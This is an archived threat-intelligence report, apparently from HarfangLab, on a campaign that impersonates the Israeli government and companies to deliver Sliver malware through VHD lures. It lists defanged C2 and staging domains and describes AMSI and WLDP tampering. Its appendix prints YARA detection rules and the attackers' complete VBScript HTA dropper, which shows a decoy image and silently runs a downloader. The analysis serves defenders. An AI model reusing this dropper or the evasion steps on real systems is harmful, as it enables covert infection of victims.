{
	"id": "9b160774-cc02-42f7-aa66-498fd36c7222",
	"created_at": "2026-04-06T00:10:41.730554Z",
	"updated_at": "2026-04-10T03:22:13.232692Z",
	"deleted_at": null,
	"sha1_hash": "082e541901faa3ec0e6e7d7c6b12b42de0dc22a2",
	"title": "Supposed Grasshopper: operators impersonate Israeli government and private companies to deploy open-source malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2055331,
	"plain_text": "Supposed Grasshopper: operators impersonate Israeli government\r\nand private companies to deploy open-source malware\r\nPublished: 2024-06-28 · Archived: 2026-04-05 13:51:12 UTC\r\nIdentifier: TRR240601.\r\nSummary\r\nhttps://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/\r\nPage 1 of 11\n\nHunting for malicious infrastructure possibly targeting the Israeli government, we identified a previously\r\nunreported, long-standing and suspicious domain. The latter is still active at the time of this report, and is\r\nleveraged as a command and control server (C2), as part of an infection chain themed around an Israeli\r\ngovernment entity.\r\nWe set out to analyse the toolset used in the context of this infection chain, and discovered that it is a mix of\r\npublicly available malware with light custom development serving as glue between the components. Pivoting\r\nfrom identified infrastructure, we additionally discovered that attacks leveraging common techniques were\r\nconducted against private companies in late 2023.\r\nAttack campaigns that we could identify and link together seem highly targeted, leverage target-specific\r\ninfrastructure and custom WordPress websites as a payload delivery mechanism, but affect a variety of entities\r\nacross unrelated verticals, and rely on well-known open-source malware.\r\nWe believe it is possible that those attack campaigns could actually be part of legitimate penetration testing\r\noperations. However, because none of the infrastructure and toolset pointed at a legitimate penetration testing\r\ncompany, we could not further confirm this hypothesis and believe the identified activity deserved to be described\r\nto the cybersecurity community.\r\nInfection chain\r\nDelivery\r\nWe set out to analyse the infection chain that we identified and that is themed around an Israeli government entity.\r\nWe could not identify the delivery source of the initial payload that we retrieved (a VHD file named\r\nvacation5.vhd, see the Initial payload section below).\r\nHowever, later pivoting from identified infrastructure and toolset, we identified further similar attack campaigns\r\n(see the Infrastructure section below). In two other identified attack campaigns, the initial payloads (VHD files) were\r\nseemingly distributed from specifically crafted WordPress websites, using a typical drive-by download scheme:\r\nhxxps://portal.operative-sintecmedia[.]com: on November 6, 2023, this custom WordPress website\r\n(see Fig. 1) contained a button linking to a VHD file, hxxps://portal.operative-sintecmedia[.]com/report.vhd\r\nhxxps://carls.employers-view[.]com: on November 11, 2023, this custom WordPress website contained\r\na button linking to a URL at login.carlsberg[.]site. On November 14, 2023, another hostname of the\r\ncarlsberg[.]site domain exposed a VHD file URL,\r\nhxxps://employees.carlsberg[.]site/voucher.vhd (this URL has been submitted to an online\r\nmultiscanner service).\r\nFigure 1 – Specifically crafted delivery WordPress website\r\nAs a result, we believe with medium confidence that the analysed initial VHD file payload has also been delivered\r\nthrough a custom WordPress website as part of a drive-by download scheme.\r\nInitial payload\r\nThe infection chain begins with a VHD file (SHA-256\r\na8948dd8e4e4961da537b40bf7e313f0358510f93e25dea1a2fafd522bfd0e84) – a format which represents a virtual\r\nhard drive that can be mounted on Windows without the need for additional tools. This disk named\r\nvacation5.vhd contains several files, although all but one are hidden:\r\nhagrala.lnk, the only visible file (and its icon, result.ico),\r\nhagrala.hta, to which the link points,\r\nwinin.exe (along with libcrypto-1_1-x64.dll and libssl-1_1-x64.dll), the first-stage malware and\r\nits two legitimate code libraries,\r\ncacert.pem, the GlobalSign Root CA R1 certificate (serial 04:00:00:00:00:01:15:4b:5a:c3:94) used by the\r\nfirst-stage malware,\r\nresult.jpg, a decoy image (see Fig. 2).\r\nWhen victims double-click on the VHD file, they are presented with a link to the HTA file whose icon is the\r\nthumbnail of an image. 
Following the shortcut causes hagrala.hta to be executed, with the following effects:\r\nThe decoy file (see Figure 2) is displayed so the victim believes they clicked on an image file,\r\nAll the files related to the first-stage malware are moved to the %TEMP% folder,\r\nThe first-stage malware is launched.\r\nThe full contents of this HTA file can be found in the appendix. We were not able to identify any other similar\r\nsample, and despite the presence of numerous comments in the VBScript source code, it doesn’t appear to come\r\nfrom any public source. We believe this piece to be a custom development by the threat actor.\r\nFigure 2 – Decoy image displayed when the HTA is executed. The text reads: “Surprise Vacation.\r\nSorry, you didn’t win” and shows the logo of the Israeli Ministry of Economy and Industry\r\nFirst-stage Nim downloader\r\nThis malware sample (SHA-256 d891f4339354d3f4c4b834e781fa4eaca2b59c6a8ee9340cc489ab0023e034c8) is a\r\nrudimentary downloader, written in Nim and tasked with downloading the second-stage malware from a staging\r\nserver controlled by the attacker. It was compiled from the following path: C:\\Users\\or\\Desktop\\nim-2.0.0\\bin\\helo.nim.\r\nThe sample establishes a connection to hxxps://auth.economy-gov-il[.]com/SUPPOSED_GRASSHOPPER.bin?token=ghhdjsdgsd – it uses the attached cacert.pem file (GlobalSign’s Root CA R1) to initialize its SSL context,\r\nbut our testing indicates that if this was supposed to be a validation mechanism, it wasn’t implemented properly, as\r\nthe malware accepts SSL certificates signed by other CAs.\r\nThe contents of the remote file are kept in memory and not saved on the victim’s hard drive. The downloader\r\nallocates a new executable buffer with VirtualAllocEx and jumps to the first byte of the next stage.\r\nWe believe the Nim downloader was created by the attackers too, as we were only able to find two additional\r\nsamples (SHA-256 c21ad804c22a67ddb62adf5f6153a99268f0b26e359b842ebeabcada824c277f and\r\nd7a66f8529f1c32342c4ed06c4a4750a93bd44161f578e5b94d6d30f7cc41581).\r\nFinal payload: Donut \u0026 Sliver\r\nThe last stage downloaded from the remote server (SHA-256\r\n2070dd30e87c492e6f44ebb0a37bcae7cb309de61e1c4e6223df090bb26b3cd7, SUPPOSED_GRASSHOPPER.bin) is a file\r\nof approximately 15 MB. It is a combination of two open-source projects:\r\nDonut, a position-independent shellcode generation framework,\r\nSliver, a publicly available Golang trojan developed as a free alternative to Cobalt Strike.\r\nIn the context of this attack and after its initialization phase (which includes self-decoding as well as resolving\r\nrequired functions via API hashing), Donut is configured to:\r\nHinder the operations of installed security products by tampering with AMSI (Antimalware Scan Interface)\r\nand WLDP (Windows Lockdown Policy):\r\nPatch the AmsiScanBuffer and AmsiScanString functions so they return immediately,\r\nDisable the WldpIsClassInApprovedList and WldpQueryDynamicCodeTrust functions the same\r\nway.\r\nMap and execute the embedded payload.\r\nThe final payload (see Fig. 3) is an instance of Sliver using www.economy-gov-il[.]com (which resolved to\r\n157.90.153[.]59 at the time of the attack) as a C2 server. 
From there, the attacker has full control of the victim’s\r\nmachine and can use all of Sliver’s features to perform any desired actions on objective.\r\nFigure 3 – Overview of the executable part of the analysed infection chain\r\nInfrastructure\r\nFurther pivoting from the infrastructure and toolset we analysed, we could identify further infrastructure that we\r\nbelieve with medium to high confidence is leveraged for similar attack campaigns by the same operators (also see\r\nFig. 4):\r\nDomain or hostname | Domain registrar | Details\r\neconomy-gov-il[.]com | GoDaddy | Domain registered on 2023-05-29. Used as a staging server by a Nim downloader and as a C2 server by a Sliver implant in the infection chain we analysed.\r\nportal.operative-sintecmedia[.]com | GoDaddy | Domain registered on 2023-10-10. Used as a staging server by a Nim downloader of the same type as the one we analysed; hosted a custom WordPress website (2023-11-04 and 06) which further linked to a VHD file (hxxps://portal.operative-sintecmedia[.]com/report.vhd, 2023-11-06) and to login.microsofonlline[.]com (2023-11-04 and 06).\r\ncarlsberg[.]site | GoDaddy | Domain registered on 2023-10-05 (existed before, but registrar changed at this date). The employees. and portal. hostnames resolved to the same IP address as portal.operative-sintecmedia[.]com. The employees. hostname exposed a VHD file (hxxps://employees.carlsberg[.]site/voucher.vhd, 2023-11-14).\r\ncarls.employers-view[.]com | GoDaddy | Domain registered on 2023-11-15. Hostname resolved to the same IP address as employees.carlsberg[.]site in November 2023. Hosted a custom WordPress website (2023-11-11) which contained a link to login.carlsberg[.]site.\r\nlogin.microsofonlline[.]com | GoDaddy | Domain registered on 2023-10-01. The custom WordPress website on portal.operative-sintecmedia[.]com contained a link to this domain (2023-11-04 and 06).\r\nUsing passive DNS data, we looked at the dates at which these domains were first and last seen to confirm their\r\ncorrelation:\r\nFigure 4 – Timeline representing the usage of the domains identified in this campaign, as well as\r\ntheir corresponding IP addresses\r\nIt is interesting to note that the purple and green clusters appear to be impersonating well-known brands (the\r\nCarlsberg brewery and SintecMedia, the publisher of an AdTech solution named Operative). At least one of them,\r\nCarlsberg, doesn’t appear to be a very valuable target for the purposes of collecting intelligence. We also note that\r\nin the “lottery” campaign, based on the lure displayed to victims, the attackers were likely impersonating the\r\nIsraeli government to target individuals or local companies but likely not targeting the Israeli government itself.\r\nOn November 6 (but not the 4), 2023, the custom WordPress website at hxxps://portal.operative-sintecmedia[.]com contained a button linking to a VHD file (hxxps://portal.operative-sintecmedia[.]com/report.vhd). On November 4 and 6, 2023, the same specifically crafted website also\r\ncontained a button linking to hxxps://login.microsofonlline[.]com/yPHnrlHf. One very interesting detail is\r\nthat on November 6, 2023 at 09:31 UTC and according to access attempt results from a scanning service, the latter\r\nURL redirected to Rick Astley’s “Never Gonna Give You Up” video (a trick known as “rickrolling” in popular\r\nculture). We could not determine if this redirection was permanent, and if it was based on visitors’ IP address or\r\nnot – this could indeed still be a deceptive redirection made as part of a geofencing technique.\r\nConclusion\r\nParadoxically, this campaign is interesting due to its very limited scope and sharp targeting. To the best of our\r\nknowledge, only a handful of samples related to this cluster of activities exist, which hints at a small number of\r\nintrusion attempts. The toolchain used by the threat actor is composed primarily of open-source tools, and the only\r\nhomemade developments we could identify are the initial HTA file and the Nim downloader. The operators also\r\nput notable effort into acquiring dedicated infrastructure and deploying realistic WordPress websites to deliver\r\npayloads. Overall, this campaign feels like it could realistically be the work of a small team.\r\nBecause of the rickrolling peculiarity that we detailed above, the fact that identified infrastructure targets a variety\r\nof entities across unrelated verticals, and the usage of widely-known open-source malware as final payloads, we\r\nbelieve with medium confidence that the described activities could be part of legitimate penetration testing\r\noperations.\r\nShould the described activities be part of penetration testing engagements, we would like to raise questions about\r\nthe standards and policies that are implemented by penetration testing companies: malicious payloads have been\r\nmade publicly available (and some of them are still being distributed), while nothing from the infrastructure or\r\ntoolset could be linked back to a legitimate penetration testing company from publicly available data and within a\r\nreasonable amount of time. 
This situation highlights the need for greater transparency, especially when taking into\r\nconsideration geopolitical contexts: impersonating or targeting government entities or critical infrastructure\r\nwithout explicit indications of a penetration test could potentially lead to unwanted responses and escalate\r\ntensions.\r\nRegardless of the intent, this cluster of activity illustrates once again that there is more than enough publicly available tooling to conduct efficient operations without any financial means, Donut and Sliver being quite\r\nsophisticated tools on their own, and WordPress being just as realistic for corporate websites as for phishing and\r\npayload delivery. The adoption of widely available attack frameworks presents challenges for threat researchers,\r\nas it becomes increasingly difficult to pivot on these parts of the infection chain. This trend is likely to continue,\r\npotentially complicating future investigations and threat analysis efforts.\r\nAppendix\r\nIndicators of compromise\r\nAssociated IOCs are also available on our GitHub repository.\r\nYara rules\r\nrule Supposed_Grasshopper_Downloader\r\n{\r\n meta:\r\n description = \"Detects the Nim downloader from the Supposed Grasshopper campaign.\"\r\n references = \"TRR240601\"\r\n date = \"2024-06-20\"\r\n author = \"HarfangLab\"\r\n context = \"file,memory\"\r\n strings:\r\n $pdb_path = \"C:\\\\Users\\\\or\\\\Desktop\\\\nim-\" ascii\r\n $code = \"helo.nim\" ascii\r\n $function_1 = \"DownloadExecute\" ascii fullword\r\n $function_2 = \"toByteSeq\" ascii fullword\r\n condition:\r\n uint16(0) == 0x5a4d and all of them\r\n}\r\nrule Donut_shellcode {\r\n meta:\r\n description = \"Detects Donut shellcode in memory.\"\r\n references = \"TRR240601\"\r\n date = \"2024-06-20\"\r\n author = \"HarfangLab\"\r\n context = \"memory\"\r\n strings:\r\n // mov rax, [rsp+arg_28] (or arg_20)\r\n // and dword ptr [rax], 0\r\n // xor eax, eax\r\n // retn\r\n $amsi_patch = { 48 8B 44 24 (28 | 30) 83 20 00 33 C0 C3 }\r\n // mov dword ptr [r8], 1\r\n // xor eax, eax\r\n // retn\r\n $wldp_patch = { 41 C7 00 01 00 00 00 33 C0 C3 }\r\n // mov eax, edx\r\n // ror ecx, 8\r\n // add ecx, r8d\r\n // mov edx, ebx\r\n // xor ecx, r9d\r\n // ror edx, 8\r\n // add edx, r9d\r\n // rol r8d, 3\r\n // xor edx, 
r10d\r\n // rol r9d, 3\r\n // xor r9d, edx\r\n // xor r8d, ecx\r\n // inc r10d\r\n // mov ebx, r11d\r\n // mov r11d, eax\r\n // cmp r10d, 1Bh\r\n $api_hashing = { 8B C2 C1 C9 08 41 03 C8 8B D3 41 33 C9 C1 CA 08 41 03 D1 41 C1 C0 03 41 33 D2 41 C1 C1\r\n $loaded_dlls = \"ole32;oleaut32;wininet;mscoree;shell32\" ascii\r\n $function_1 = \"WldpQueryDynamicCodeTrust\" ascii\r\n $function_2 = \"WldpIsClassInApprovedList\" ascii\r\n $function_3 = \"AmsiInitialize\" ascii\r\n $function_4 = \"AmsiScanBuffer\" ascii\r\n $function_5 = \"AmsiScanString\" ascii\r\n condition:\r\n // Shellcode starts with a \"call\"\r\n uint8(0) == 0xE8 and\r\n (\r\n // Find either all the patching/decoding code or the suspicious strings\r\n (#amsi_patch \u003e 1 and $wldp_patch and $api_hashing) or\r\n ($loaded_dlls and all of ($function_*))\r\n )\r\n}\r\nContents of hagrala.hta:\r\n\u003cscript language=\"VBScript\"\u003e\r\n    Sub MoveAndExecuteFile\r\n        Dim objFSO, objShell\r\n        Set objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\n        Set objShell = CreateObject(\"WScript.Shell\")\r\n        objShell.Run \"result.jpg\", 0, False\r\n        ' Specify the source file and destination directory\r\n        Dim sourceFile, destinationFolder\r\n        sourceFile = \"winin.exe\" ' Replace with the actual path to win.exe\r\n        destinationFolder = CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%Temp%\")\r\n        ' Move cacert.pem to Temp\r\n        sourceFile = \"cacert.pem\"\r\n        objFSO.MoveFile sourceFile, destinationFolder \u0026 \"\" \u0026 sourceFile\r\n        ' Move libcrypto-1_1-x64.dll to Temp\r\n        sourceFile = \"libcrypto-1_1-x64.dll\"\r\n        objFSO.MoveFile sourceFile, destinationFolder \u0026 \"\" \u0026 sourceFile\r\n        ' Move libssl-1_1-x64.dll to Temp\r\n        sourceFile = \"libssl-1_1-x64.dll\"\r\n        objFSO.MoveFile sourceFile, destinationFolder \u0026 \"\" \u0026 sourceFile\r\n        ' Check if the source file exists\r\n        sourceFile = \"winin.exe\" ' Replace with the actual path to win.exe\r\n        If objFSO.FileExists(sourceFile) Then\r\n            ' Check if the destination folder exists; if not, create it\r\n            If Not objFSO.FolderExists(destinationFolder) Then\r\n                objFSO.CreateFolder(destinationFolder)\r\n            End If\r\n            ' Move the file\r\n            objFSO.MoveFile sourceFile, destinationFolder \u0026 \"winin.exe\"\r\n            ' Execute the moved file\r\n            objShell.Run \"\"\"\" \u0026 destinationFolder \u0026 \"winin.exe\"\"\", 0, False\r\n            ' Close the HTA application after moving and executing the file\r\n            window.Close\r\n        Else\r\n            MsgBox \"Source file not found.\", vbExclamation, \"File Move and Execute\"\r\n        End If\r\n    End Sub\r\n    ' Call the MoveAndExecuteFile subroutine when the HTA is loaded\r\n    MoveAndExecuteFile\r\n\u003c/script\u003e\r\nSource: https://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/"
	],
	"report_names": [
		"supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434241,
	"ts_updated_at": 1775791333,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/082e541901faa3ec0e6e7d7c6b12b42de0dc22a2.pdf",
		"text": "https://archive.orkl.eu/082e541901faa3ec0e6e7d7c6b12b42de0dc22a2.txt",
		"img": "https://archive.orkl.eu/082e541901faa3ec0e6e7d7c6b12b42de0dc22a2.jpg"
	}
}